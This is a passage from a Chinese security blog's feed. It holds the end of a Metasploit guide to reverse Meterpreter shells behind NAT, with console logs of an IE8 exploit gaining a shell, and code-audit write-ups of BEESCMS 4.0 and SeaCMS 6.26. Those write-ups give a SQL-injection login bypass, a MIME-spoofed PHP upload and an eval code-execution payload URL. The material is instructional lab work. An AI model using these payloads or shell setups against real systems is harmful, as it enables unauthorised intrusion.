443</span><br></pre></td></tr></table></figure></p><p>注意:在任何情况下,为了使事情尽可能简单,请尝试为特定的“服务”使用相同的端口. 也就是说,如果您在防火墙的80端口上托管Web服务器,请尝试确保也转发80端口的流量到攻击机/Metasploit上,并在Metasploit的80端口上加载漏洞exp。同样适用于有效载荷。如果我们在端口443上提供有效载荷,请确保在每个地方都使用此端口。<br>LHOST有两个目的: </p><ul><li>它指示Meterpreter shellcode必须反向连接的IP地址(从靶机到攻击机)。</li><li>它告诉Metasploit在设置Meterpreter“处理程序”时绑定到哪里。 </li></ul><p>由于我们的攻击者主机位于NAT之后,我们必须使用路由器/防火墙的公网IP地址作为LHOST. 执行漏洞利用时,此IP将嵌入到shellcode中,当初始Meterpreter shellcode在靶机上运行时,它将反向连接这个IP地址。我们的路由器/防火墙上的端口转发然后将流量转发到攻击者主机的内网IP。为此,我们需要将LHOST设置为1.1.1.1(你的攻击机的公网IP)。 </p><p>使用公网IP作为LHOST也意味着Metasploit将在设置Meterpreter处理程序时尝试将自身绑定到该IP。由于此IP属于路由器/防火墙而不属于Metasploit实例,因此显然会失败。幸运的是,Metasploit将自动回退到0.0.0.0,并基本上为攻击机上的所有本地IP提供Meterpreter处理程序服务,同时记住LHOST已设置为我们的公网IP地址。这正是我们所需要的。 </p><p>将LHOST设置为1.1.1.1:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msf exploit(ms13_069_caret)>设置LHOST 1.1.1.1</span><br><span class="line">LHOST => 1.1.1.1</span><br></pre></td></tr></table></figure></p><p>如果我们真的不希望Meterpreter处理程序回退到0.0.0.0,我们可以使用其中一个“高级”选项并告诉它监听内网IP地址:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msf exploit(ms13_069_caret) > set ReverseListenerBindAddress 192.168.0.187</span><br><span class="line">ReverseListenerBindAddress => 192.168.0.187</span><br></pre></td></tr></table></figure></p><p>然后启动漏洞exp:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">msf exploit(ms13_069_caret) > exploit</span><br><span class="line">[*] Exploit running as background job.</span><br><span class="line"></span><br><span class="line">[*] Started HTTPS reverse handler on https://192.168.0.187:443/</span><br><span class="line">[*] Using URL: http://0.0.0.0:80/</span><br><span class="line">[*] Local IP: http://192.168.0.187:80/</span><br><span class="line">[*] Server started.</span><br></pre></td></tr></table></figure></p><p>输出告诉我们 </p><ul><li><a href="http://0.0.0.0:80" target="_blank" rel="noopener">http://0.0.0.0:80</a> ,(或<a href="http://192.168.0.187:80" target="_blank" rel="noopener">http://192.168.0.187:80</a> )正在托管浏览器exp。如果目标连接到<a href="http://1.1.1.1" target="_blank" rel="noopener">http://1.1.1.1</a>, 流量将通过80端口转发Kali并为exp利用。</li><li>HTTPS反向处理程序正在侦听192.168.0.187,端口443。 </li></ul><p>我们在输出中没有看到的是,实际的Meterpreter shellcode包含要重新连接的IP地址1.1.1.1。该值取自LHOST变量。 </p><p>如果您没有使用ReverseListenerBindAddress并且在运行“exploit”后得到类似下面的输出,那么请检查以下内容: </p><ul><li>检查端口是否可以免费使用</li><li>确保您运行的是最新版本的Metasploit</li><li>将ReverseListenerBindAddress设置为本地LAN IP或0.0.0.0</li><li>退出msfconsole并再次打开它。在某些情况下,如果您之前运行过会话,您会发现绑定没有得到及时清理。<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">msf exploit(ms13_069_caret) > exploit</span><br><span class="line">[*] Exploit running as background job.</span><br><span class="line"></span><br><span class="line">[-] Exploit failed: Rex::AddressInUse The address is already in use (0.0.0.0:443).</span><br></pre></td></tr></table></figure></li></ul><p>如果我们现在在靶机上使用IE8(来自IECollection)并连接到攻击端路由器/防火墙的公网IP的80端口,我们应该看到:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">msf exploit(ms13_069_caret) > [*] 2.2.2.2 ms13_069_caret - Sending exploit...</span><br><span class="line">[*] 2.2.2.2 ms13_069_caret - Sending exploit...</span><br><span class="line">[*] 2.2.2.2:53893 Request received for /NtFT...</span><br><span class="line">[*] 2.2.2.2:53893 Staging connection for target /NtFT received...</span><br><span class="line">[*] Patched user-agent at offset 663128...</span><br><span class="line">[*] Patched transport at offset 662792...</span><br><span class="line">[*] Patched URL at offset 662856...</span><br><span class="line">[*] Patched Expiration Timeout at offset 663728...</span><br><span class="line">[*] Patched Communication Timeout at offset 663732...</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.0.187:443 -> 2.2.2.2:53893) at 2014-01-05 09:24:26 +0100</span><br><span class="line">[*] Session ID 1 (192.168.0.187:443 -> 2.2.2.2:53893) processing InitialAutoRunScript 'migrate -f'</span><br><span class="line">[*] Current server process: iexplore.exe (2952)</span><br><span class="line">[*] Spawning notepad.exe process to migrate to</span><br><span class="line">[+] Migrating to 500</span><br><span class="line">[+] Successfully migrated to process </span><br><span class="line"></span><br><span class="line">msf exploit(ms13_069_caret) > sessions -i 1</span><br><span class="line">[*] Starting interaction with 1...</span><br><span class="line"></span><br><span class="line">meterpreter > shell</span><br><span class="line">Process 592 created.</span><br><span class="line">Channel 1 created.</span><br><span class="line">Microsoft Windows XP [Version 5.1.2600]</span><br><span class="line">(C) Copyright 1985-2001 Microsoft Corp.</span><br><span class="line"></span><br><span class="line">C:\Documents and Settings\peter\Desktop></span><br></pre></td></tr></table></figure></p><p>2.2.2.2是靶机的公网IP。当靶机连接到端口80时,Metasploit正在发送有效载荷,利用浏览器并执行初始的meterpreter有效载荷。此有效负载将下载metsrv.dll(首先由Metasploit生成,因此它将包含攻击者的公网IP和端口),将其加载到内存中(使用反射负载)并运行代码。完成后,您将获得一个完整的Meterpreter会话。Life is good. </p><p>所以,简而言之,你应该设置以下变量: </p><ul><li>SRVHOST:0.0.0.0</li><li>SRVPORT:设置为您要使用的浏览器exp的端口</li><li>LHOST:攻击机的公网IP</li><li>LPORT:设置为要为Meterpreter处理程序连接的端口</li><li>ReverseListenerBindAddress:LANIP (可选)</li></ul><p>无论出于何种原因,如果您还希望在另一个端口上托管Meterpreter处理程序而不是客户端将连接到的端口,那么您可以使用LPORT指定目标将连接回的位置,并使用ReverseListenerBindPort指示处理程序侦听的位置。显然,您需要确保端口转发将连接到攻击机上的正确端口。</p>]]></content>
<summary type="html">
<h1 id="翻译:Metasploit-Meterpreter-and-NAT"><a href="#翻译:Metasploit-Meterpreter-and-NAT" class="headerlink" title="翻译:Metasploit Meterpreter
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="metasploit" scheme="http://yoursite.com/tags/metasploit/"/>
</entry>
<entry>
<title>代码审计入门-BEESCMS4.0</title>
<link href="http://yoursite.com/2018/12/04/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%85%A5%E9%97%A8-BEESCMS4.0/"/>
<id>http://yoursite.com/2018/12/04/代码审计入门-BEESCMS4.0/</id>
<published>2018-12-03T16:18:45.000Z</published>
<updated>2020-03-14T15:37:42.549Z</updated>
<content type="html"><![CDATA[<h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>BEESCMS企业网站管理系统是一款PHP+MYSQL的多语言系统,内容模块易扩展,模板风格多样化,模板制作简单功能强大,专业SEO优化,后台操作方便,完全可以满足企业网站、外贸网站、事业单位、教育机构、个人网站使用。<br>该CMS适合入门代码审计。</p><h2 id="后台登陆SQL注入漏洞"><a href="#后台登陆SQL注入漏洞" class="headerlink" title="后台登陆SQL注入漏洞"></a>后台登陆SQL注入漏洞</h2><p>admin\Login.php中有如下代码:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">//判断登录</span><br><span class="line">elseif($action=='ck_login'){</span><br><span class="line">global $submit,$user,$password,$_sys,$code;</span><br><span class="line">$submit=$_POST['submit'];</span><br><span class="line">$user=fl_html(fl_value($_POST['user']));</span><br><span class="line">$password=fl_html(fl_value($_POST['password']));</span><br><span class="line">$code=$_POST['code'];</span><br><span class="line">if(!isset($submit)){</span><br><span class="line">msg('请从登陆页面进入');</span><br><span class="line">}</span><br><span class="line">if(empty($user)||empty($password)){</span><br><span class="line">msg("密码或用户名不能为空");</span><br><span class="line">}</span><br><span class="line">if(!empty($_sys['safe_open'])){</span><br><span class="line">foreach($_sys['safe_open'] as $k=>$v){</span><br><span class="line">if($v=='3'){</span><br><span class="line">if($code!=$s_code){msg("验证码不正确!");}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">check_login($user,$password);</span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>输入的user和password经过fl_value函数和fl_html处理<br>而fl_value函数如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">function fl_value($str){</span><br><span class="line">if(empty($str)){return;}</span><br><span class="line">return preg_replace('/select|insert | update | and | in | on | left | joins | delete |\%|\=|\/\*|\*|\.\.\/|\.\/| union | from | where | group | into |load_file</span><br><span class="line">|outfile/i','',$str);</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>该函数仅使用preg_replace函数对关键词进行处理,因此可以双写绕过。<br>fl_html函数使用主要是为了防止xss漏洞,无关紧要。<br>往下使用check_login函数进行判断:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">function check_login($user,$password){</span><br><span class="line">$rel=$GLOBALS['mysql']->fetch_asc("select id,admin_name,admin_password,admin_purview,is_disable from ".DB_PRE."admin where admin_name='".$user."' limit 0,1");</span><br><span class="line">$rel=empty($rel)?'':$rel[0];</span><br><span class="line">if(empty($rel)){</span><br><span class="line">msg('不存在该管理用户','login.php');</span><br><span class="line">}</span><br><span class="line">$password=md5($password);</span><br><span class="line">if($password!=$rel['admin_password']){</span><br><span class="line">msg("输入的密码不正确");</span><br><span class="line">}</span><br><span class="line">if($rel['is_disable']){</span><br><span class="line">msg('该账号已经被锁定,无法登陆');</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$_SESSION['admin']=$rel['admin_name'];</span><br><span class="line">$_SESSION['admin_purview']=$rel['admin_purview'];</span><br><span class="line">$_SESSION['admin_id']=$rel['id'];</span><br><span class="line">$_SESSION['admin_time']=time();</span><br><span class="line">$_SESSION['login_in']=1;</span><br><span class="line">$_SESSION['login_time']=time();</span><br><span class="line">$ip=fl_value(get_ip());</span><br><span class="line">$ip=fl_html($ip);</span><br><span class="line">$_SESSION['admin_ip']=$ip;</span><br><span class="line">unset($rel);</span><br><span class="line">header("location:admin.php");</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>该函数先向数据库查询$user,然后将输入的$password的MD5值与查询得到的$rel[‘admin_password’]进行比较,相同则能成功登陆。可以构造:<br>user:0’ un/**ion se/**lect 1,1,’202cb962ac59075b964b07152d234b70’,1,0;#<br>password :123(’202cb962ac59075b964b07152d234b70’是’123’的MD5值)<br>成功的绕过登陆:<br><img src="/2018/12/04/代码审计入门-BEESCMS4.0/1.png" alt=""></p><h2 id="任意文件上传漏洞"><a href="#任意文件上传漏洞" class="headerlink" title="任意文件上传漏洞"></a>任意文件上传漏洞</h2><p>在admin/upload.php中有如下代码:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line">if(isset($_FILES['up'])){</span><br><span class="line">if(is_uploaded_file($_FILES['up']['tmp_name'])){</span><br><span class="line">if($up_type=='pic'){</span><br><span class="line">$is_thumb=empty($_POST['thumb'])?0:$_POST['thumb'];</span><br><span class="line">$thumb_width=empty($_POST['thumb_width'])?$_sys['thump_width']:intval($_POST['thumb_width']);</span><br><span class="line">$thumb_height=empty($_POST['thumb_height'])?$_sys['thump_height']:intval($_POST['thumb_height']);</span><br><span class="line">$logo=0;</span><br><span class="line">$is_up_size = $_sys['upload_size']*1000*1000;</span><br><span class="line">$value_arr=up_img($_FILES['up'],$is_up_size,array('image/gif','image/jpeg','image/png','image/jpg','image/bmp','image/pjpeg'),$is_thumb,$thumb_width,$thumb_height,$logo);</span><br><span class="line">$pic=$value_arr['pic'];</span><br><span class="line">if(!empty($value_arr['thumb'])){</span><br><span class="line">$pic=$value_arr['thumb'];</span><br><span class="line">}</span><br><span class="line">$str="<script type=\"text/javascript\">$(self.parent.document).find('#{$get}').val('{$pic}');self.parent.tb_remove();</script>";</span><br><span class="line">echo $str;</span><br><span class="line">exit;</span><br><span class="line">}//图片上传</span><br><span class="line">}else{</span><br><span class="line">die('没有上传文件或文件大小超过服务器限制大小<a href="javascript:history.back(1);">返回重新上传</a>');</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">?></span><br></pre></td></tr></table></figure></p><p>上传的文件被传入函数up_img中,同时还传入了允许文件上传类型的白名单。up_img函数如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">function up_img($file,$size,$type,$thumb=0,$thumb_width='',$thumb_height='',$logo=1,$pic_alt=''){</span><br><span class="line">if(file_exists(DATA_PATH.'sys_info.php')){include(DATA_PATH.'sys_info.php');}</span><br><span class="line">if(is_uploaded_file($file['tmp_name'])){</span><br><span class="line">if($file['size']>$size){</span><br><span class="line">msg('图片超过'.$size.'大小');</span><br><span class="line">}</span><br><span class="line">$pic_name=pathinfo($file['name']);//图片信息</span><br><span class="line"></span><br><span class="line">$file_type=$file['type'];</span><br><span class="line">if(!in_array(strtolower($file_type),$type)){</span><br><span class="line">msg('上传图片格式不正确');</span><br><span class="line">}</span><br><span class="line">$path_name="upload/img/";</span><br><span class="line">$path=CMS_PATH.$path_name;</span><br><span class="line">if(!file_exists($path)){</span><br><span class="line">@mkdir($path);</span><br><span class="line">}</span><br><span class="line">$up_file_name=empty($pic_alt)?date('YmdHis').rand(1,10000):$pic_alt;</span><br><span class="line">$up_file_name2=iconv('UTF-8','GBK',$up_file_name);</span><br><span class="line">$file_name=$path.$up_file_name2.'.'.$pic_name['extension'];</span><br><span class="line"></span><br><span class="line">if(file_exists($file_name)){</span><br><span class="line">msg('已经存在该图片,请更改图片名称!');//判断是否重名</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$return_name['up_pic_size']=$file['size'];//上传图片大小</span><br><span class="line">$return_name['up_pic_ext']=$pic_name['extension'];//上传文件扩展名</span><br><span class="line">$return_name['up_pic_name']=$up_file_name;//上传图片名</span><br><span class="line">$return_name['up_pic_path']=$path_name;//上传图片路径</span><br><span class="line">$return_name['up_pic_time']=time();//上传时间</span><br><span class="line">unset($pic_name);</span><br><span class="line">//开始上传</span><br><span class="line">if(!move_uploaded_file($file['tmp_name'],$file_name)){</span><br><span class="line">msg('图片上传失败','',0);</span><br><span class="line">}</span><br><span class="line">...//省略后边的无关代码</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>问题出在这里:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$file_type=$file['type'];</span><br><span class="line">if(!in_array(strtolower($file_type),$type)){</span><br><span class="line">msg('上传图片格式不正确');</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>对文件类型进行判断时取的是mime类型,可以通过burpsuit抓包更改。<br>文件名称的处理为:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$up_file_name=empty($pic_alt)?date('YmdHis').rand(1,10000):$pic_alt;</span><br><span class="line">$up_file_name2=iconv('UTF-8','GBK',$up_file_name);</span><br><span class="line">$file_name=$path.$up_file_name2.'.'.$pic_name['extension'];</span><br></pre></td></tr></table></figure></p><p>文件后缀取的是$pic_name[‘extension’]!!!<br>文件名称虽然被更改并且随机化,但可以枚举的办法获得。此外可以在后台网站基本设置logo图片处上传php文件抓包更改mime类型后,可以看到文件名。<br><img src="/2018/12/04/代码审计入门-BEESCMS4.0/2.png" alt=""><br><img src="/2018/12/04/代码审计入门-BEESCMS4.0/3.png" alt=""><br>获得地址:<a href="http://127.0.0.1/upload/img/201812031932133189.php" target="_blank" rel="noopener">http://127.0.0.1/upload/img/201812031932133189.php</a></p>]]></content>
<summary type="html">
<h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>BEESCMS企业网站管理系统是一款PHP+MYSQL的多语言系统,内容模块易扩展,模板风格多样化,模板制作简单功能强大,专业SEO优化,后
</summary>
<category term="web安全" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/"/>
<category term="代码审计" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="PHP" scheme="http://yoursite.com/tags/PHP/"/>
<category term="文件上传" scheme="http://yoursite.com/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/"/>
<category term="SQL注入" scheme="http://yoursite.com/tags/SQL%E6%B3%A8%E5%85%A5/"/>
</entry>
<entry>
<title>Seacms6.26任意代码执行漏洞分析</title>
<link href="http://yoursite.com/2018/11/26/Seacms6.26%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/"/>
<id>http://yoursite.com/2018/11/26/Seacms6.26任意代码执行漏洞分析/</id>
<published>2018-11-26T14:57:50.000Z</published>
<updated>2020-03-14T15:37:31.354Z</updated>
<content type="html"><![CDATA[<p>简介:海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。<br>由于是新手,所以在此低版本中进行代码审计练习。<br>在search.php中存在漏洞<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">require_once("include/common.php");</span><br><span class="line">require_once(sea_INC."/main.class.php");</span><br><span class="line"></span><br><span class="line">$schwhere = '';</span><br><span class="line">foreach($_GET as $k=>$v)</span><br><span class="line">{</span><br><span class="line"> $$k=_RunMagicQuotes(gbutf8(RemoveXSS($v)));</span><br><span class="line">$schwhere.= "&$k=".urlencode($$k);</span><br><span class="line">}</span><br><span class="line">$schwhere = ltrim($schwhere,'&');</span><br><span class="line"></span><br><span class="line">$page = (isset($page) && is_numeric($page)) ? $page : 1;</span><br><span class="line">$searchtype = (isset($searchtype) && is_numeric($searchtype)) ? $searchtype : -1;</span><br><span class="line">$tid = (isset($tid) && is_numeric($tid)) ? intval($tid) : 0;</span><br><span class="line">if(!isset($searchword)) $searchword = '';</span><br><span class="line">$action = $_REQUEST['action'];</span><br><span class="line">$searchword = RemoveXSS(stripslashes($searchword));</span><br><span class="line">$searchword = addslashes(cn_substr($searchword,20));</span><br><span class="line">if($cfg_notallowstr !='' && m_eregi($cfg_notallowstr,$searchword))</span><br><span class="line">{</span><br><span class="line">ShowMsg("你的搜索关键字中存在非法内容,被系统禁止!","index.php","0",$cfg_search_time*1000);</span><br><span class="line">exit();</span><br><span class="line">}</span><br><span class="line">if($searchword==''&&$searchtype!=5)</span><br><span class="line">{</span><br><span class="line">ShowMsg('关键字不能为空!','index.php','0',$cfg_search_time*1000);</span><br><span class="line">exit();</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>第五行的循环可以以get方式接收任意参数及值 </p><p>在echoSearchPage()中:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">global $dsql,$cfg_iscache,$mainClassObj,$page,$t1,$cfg_search_time,$searchtype,$searchword,$tid,$year,$letter,$area,$yuyan,$state,$ver,$order,$jq,$money,$cfg_basehost;</span><br><span class="line">$order = !empty($order)?$order:time;</span><br><span class="line">if(intval($searchtype)==5)</span><br><span class="line">{</span><br><span class="line">$searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/cascade.html";</span><br><span class="line">$typeStr = !empty($tid)?intval($tid).'_':'0_';</span><br><span class="line">$yearStr = !empty($year)?PinYin($year).'_':'0_';</span><br><span class="line">$letterStr = !empty($letter)?$letter.'_':'0_';</span><br><span class="line">$areaStr = !empty($area)?PinYin($area).'_':'0_';</span><br><span class="line">$orderStr = !empty($order)?$order.'_':'0_';</span><br><span class="line">$jqStr = !empty($jq)?$jq.'_':'0_';</span><br><span class="line">$cacheName="parse_cascade_".$typeStr.$yearStr.$letterStr.$areaStr.$orderStr;</span><br><span class="line">$pSize = getPageSizeOnCache($searchTemplatePath,"cascade","");</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>在该处以global方式声明了$area、$year等参数,而这些参数可以在url中任意构造。<br>这些值被保存于$cacheName中 </p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">if($cfg_iscache){</span><br><span class="line">if(chkFileCache($cacheName)){</span><br><span class="line">$content = getFileCache($cacheName);</span><br><span class="line">}else{</span><br><span class="line">$content = parseSearchPart($searchTemplatePath);</span><br><span class="line">setFileCache($cacheName,$content);</span><br><span class="line">}</span><br><span class="line">}else{</span><br><span class="line">$content = parseSearchPart($searchTemplatePath);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>在该处$content读取html模板文件 </p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$content = str_replace("{searchpage:order-hit-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=hit&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);</span><br><span class="line">...</span><br></pre></td></tr></table></figure><p>此处将输入的$area等参数插入$content中 </p><p>在function parseIf($content)中:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">if (strpos($content,'{if:')=== false){</span><br><span class="line"> return $content;</span><br><span class="line">}else{</span><br><span class="line">$labelRule = buildregx("{if:(.*?)}(.*?){end if}","is");</span><br><span class="line">$labelRule2="{elseif";</span><br><span class="line">$labelRule3="{else}";</span><br><span class="line">preg_match_all($labelRule,$content,$iar);</span><br><span class="line">$arlen=count($iar[0]);</span><br><span class="line">$elseIfFlag=false;</span><br><span class="line">for($m=0;$m<$arlen;$m++){</span><br><span class="line">$strIf=$iar[1][$m];</span><br><span class="line">$strIf=$this->parseStrIf($strIf);</span><br><span class="line">$strThen=$iar[2][$m];</span><br><span class="line">$strThen=$this->parseSubIf($strThen);</span><br><span class="line">if (strpos($strThen,$labelRule2)===false){</span><br><span class="line">if (strpos($strThen,$labelRule3)>=0){</span><br><span class="line">$elsearray=explode($labelRule3,$strThen);</span><br><span class="line">$strThen1=$elsearray[0];</span><br><span class="line">$strElse1=$elsearray[1];</span><br><span class="line">@eval("if(".$strIf."){\$ifFlag=true;}else{\$ifFlag=false;}");</span><br><span class="line">if ($ifFlag){ $content=str_replace($iar[0][$m],$strThen1,$content);} else {$content=str_replace($iar[0][$m],$strElse1,$content);}</span><br><span class="line">}else{</span><br><span class="line">@eval("if(".$strIf.") { \$ifFlag=true;} else{ \$ifFlag=false;}");</span><br><span class="line">if ($ifFlag) $content=str_replace($iar[0][$m],$strThen,$content); else $content=str_replace($iar[0][$m],"",$content);}</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>preg_match_all处将之前插入的值取出<br>在@eval中执行语句 </p><p>payload:<a href="http://127.0.0.1/haiyang/search.php?searchtype=5&letter=phpinfo()" target="_blank" rel="noopener">http://127.0.0.1/haiyang/search.php?searchtype=5&letter=phpinfo()</a><br>效果:<br><img src="/2018/11/26/Seacms6.26任意代码执行漏洞分析/1.png" alt=""></p>]]></content>
<summary type="html">
<p>简介:海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。<br>由于是新手,所以在此低版本中进行代码审计练习。<br>
</summary>
<category term="web安全" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/"/>
<category term="代码审计" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="PHP" scheme="http://yoursite.com/tags/PHP/"/>
</entry>
</feed>